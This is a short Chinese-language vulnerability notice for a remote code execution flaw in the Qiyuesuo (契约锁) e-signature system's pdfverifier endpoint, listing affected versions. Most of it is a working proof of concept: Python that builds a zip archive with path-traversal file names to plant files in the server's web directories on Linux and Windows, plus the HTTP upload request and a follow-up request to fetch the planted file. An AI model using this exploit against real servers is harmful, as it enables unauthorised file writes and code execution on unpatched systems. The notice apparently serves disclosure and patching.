漏洞描述
2025年07月07日,契约锁发布安全补丁修复了远程代码执行漏洞。该漏洞允许未授权攻击者通过特定方式在服务器上执行任意代码。由于该漏洞利用难度较低,建议相关用户及时更新安全补丁进行修复。
影响版本:
4.3.8 <= 契约锁 <= 5.x.x && 补丁版本 < 2.1.8
4.0.x <= 契约锁 <= 4.3.7 && 补丁版本 < 1.3.8
契约锁-电子签章系统 pdfverifier 远程代码执行漏洞
PoC代码
import zipfile
from base64 import b64encode
import tempfile
with tempfile.NamedTemporaryFile(suffix='.zip') as tmp_zip:
with zipfile.ZipFile(tmp_zip, 'w') as new_zip:
file_name = '8b65bc0880023dc52a55'
#Linux
new_zip.writestr(
f"{'../' * 500}proc/self/cwd/resources/css/{file_name}.css",
b"https://www.qiyuesuo.com/more/security/servicepack"
)
#Windows
new_zip.writestr(
f"{'../' * 500}qiyuesuo/security/resources/css/{file_name}.css",
b"https://www.qiyuesuo.com/more/security/servicepack"
)
tmp_zip.seek(0)
print(b64encode(tmp_zip.read()).decode())
POST /pdfverifier HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=f11cab403f27e81fb32bf82855f49809
--f11cab403f27e81fb32bf82855f49809
Content-Disposition: form-data; name="file"; filename="f11cab403f27e81fb32bf82855f49809.ofd"
{{base64dec(压缩包内容)}}
--f11cab403f27e81fb32bf82855f49809--
GET /qyswebapp/assets/css/8b65bc0880023dc52a55.css HTTP/1.1